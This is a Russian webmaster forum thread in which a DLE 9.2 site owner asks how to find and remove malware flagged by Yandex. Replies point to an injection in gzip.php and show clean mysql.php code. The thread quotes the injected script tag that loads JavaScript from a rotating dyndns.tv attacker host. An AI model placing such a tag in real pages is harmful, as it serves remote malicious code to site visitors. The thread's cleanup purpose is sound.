- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На сайте уже какой раз подряд проскакивает один вирус, точнее проскакивает он в яндексе и губит всё. Вердикт от яндекса "Поведенческий анализ".
Просмотрев большинство файлов, в которых мог прятаться вирус, ничего не обнаружил.
Яндекс написал, что вредоносная часть:
<script src="http://geogrephicalupscaty.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script>
Вот эта часть urla "geogrephicalupscaty" постоянно меняется, поэтому как-то отследить не удается, да и яндекс переодически выводит что нету вируса. Но он все таки имеется.
Прошу помочь, как найти и удалить этот вредоносный код?
Сайт на DLE 9.2
как найти и удалить этот вредоносный код?
Прежде чем топик создать - посмотреть на закреплённую тему - никак?
Вот эта часть urla "geogrephicalupscaty" постоянно меняется
Эта часть - результат деятельности вируса, а не вирус. Короче читайте ФАК.
engine/modules/gzip.php
вставка в конце
http://pastebin.com/A6Aadc7M
подсказывайте из каких файлов эти функции информацию берут???
На сайте уже какой раз подряд проскакивает один вирус, точнее проскакивает он в яндексе и губит всё. Вердикт от яндекса "Поведенческий анализ".
Просмотрев большинство файлов, в которых мог прятаться вирус, ничего не обнаружил.
Яндекс написал, что вредоносная часть:
<script src="http://geogrephicalupscaty.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script>
Вот эта часть urla "geogrephicalupscaty" постоянно меняется, поэтому как-то отследить не удается, да и яндекс переодически выводит что нету вируса. Но он все таки имеется.
Прошу помочь, как найти и удалить этот вредоносный код?
Сайт на DLE 9.2
\engine\classes\mysql.php - (этот код может быть в любом php файле)
наверно так:
а должно быть так:
if(!defined('DATALIFEENGINE'))
{
die("Hacking attempt!");
}
if ( extension_loaded('mysqli') )
{
include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
include_once( ENGINE_DIR."/classes/mysql.class.php" );
}
Но не обольщайтесь, удаление этого кода ничего не даст, если не обезопасить себя.